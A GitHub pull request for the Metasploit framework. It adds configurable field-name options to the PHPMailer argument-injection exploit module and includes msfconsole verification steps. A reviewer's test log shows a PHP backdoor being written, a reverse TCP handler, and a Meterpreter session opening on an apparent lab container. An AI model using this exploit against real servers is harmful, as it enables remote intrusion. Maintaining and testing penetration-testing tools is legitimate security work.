Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Phpmailer arg injection update #16721

Merged
merged 9 commits into from
Jun 29, 2022
Merged

Phpmailer arg injection update #16721

merged 9 commits into from
Jun 29, 2022

Conversation

erikbomb
Copy link
Contributor

Added Advanced options to change the name of the fields for the name, email, and message objects. Set the default to the previous hard coded value.

No changes to the functionality of the code just adding the ability for users to modify values. Edited previous advanced option to comply with camel case.

Also went to the documentation and added the new advanced options.

This update was in the attic (Did not have time to work on this for a while sorry!) RE #15810
Thanks for the help!

Verification

  • Start msfconsole
  • use exploits/multi/http/phpmailer_arg_injection
  • set NAME_FIELD different_name

@smcintyre-r7

@smcintyre-r7 smcintyre-r7 self-assigned this Jun 27, 2022
erikbomb and others added 2 commits June 28, 2022 23:08
@erikbomb @smcintyre-r7
Update modules/exploits/multi/http/phpmailer_arg_injection.rb
695e124 
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
@smcintyre-r7
Fix a whitespace issue, restore option naming
1b7d8f1
@smcintyre-r7
Copy link
Contributor

Tested this successfully and everything is looking good. Changing the field datastore options will affect success, so I left them at their default values but confirmed they were changing the outcome. Once the unit tests pass, I'll get this landed.

[*] Processing /home/smcintyre/.msf4/msfconsole.rc for ERB directives.
resource (/home/smcintyre/.msf4/msfconsole.rc)> load request
[*] Successfully loaded plugin: Request
resource (/home/smcintyre/.msf4/msfconsole.rc)> load versions
[*] versions plugin loaded.
[*] Successfully loaded plugin: versions
resource (/home/smcintyre/.msf4/msfconsole.rc)> loadpath test/modules
Loaded 38 modules:
    14 auxiliary modules
    13 exploit modules
    11 post modules
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Writing the backdoor to /www/q19zYsn1.php
[*] Sleeping before requesting the payload from: /q19zYsn1.php
[*] Waiting for up to 300 seconds to trigger the payload
[+] Successfully found the payload
[*] Sending stage (39927 bytes) to 172.17.0.2
[+] Deleted /www/q19zYsn1.php
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 172.17.0.2:40494) at 2022-06-29 12:04:52 -0400
[+] Successfully triggered the payload

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.128 - Meterpreter session 1 closed.  Reason: Died

@smcintyre-r7 smcintyre-r7 merged commit 2d6e910 into rapid7:master Jun 29, 2022
@smcintyre-r7
Copy link
Contributor

Release Notes

This updates the PHP Mailer Argument Injection exploit to allow setting the names of certain fields via advanced options. These configuration options then allow the exploit to work in additional scenarios.

@smcintyre-r7 smcintyre-r7 added the rn-enhancement release notes enhancement label Jun 29, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@smcintyre-r7 smcintyre-r7 smcintyre-r7 approved these changes

Assignees

@smcintyre-r7 smcintyre-r7

Labels
enhancement module rn-enhancement release notes enhancement
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@erikbomb @smcintyre-r7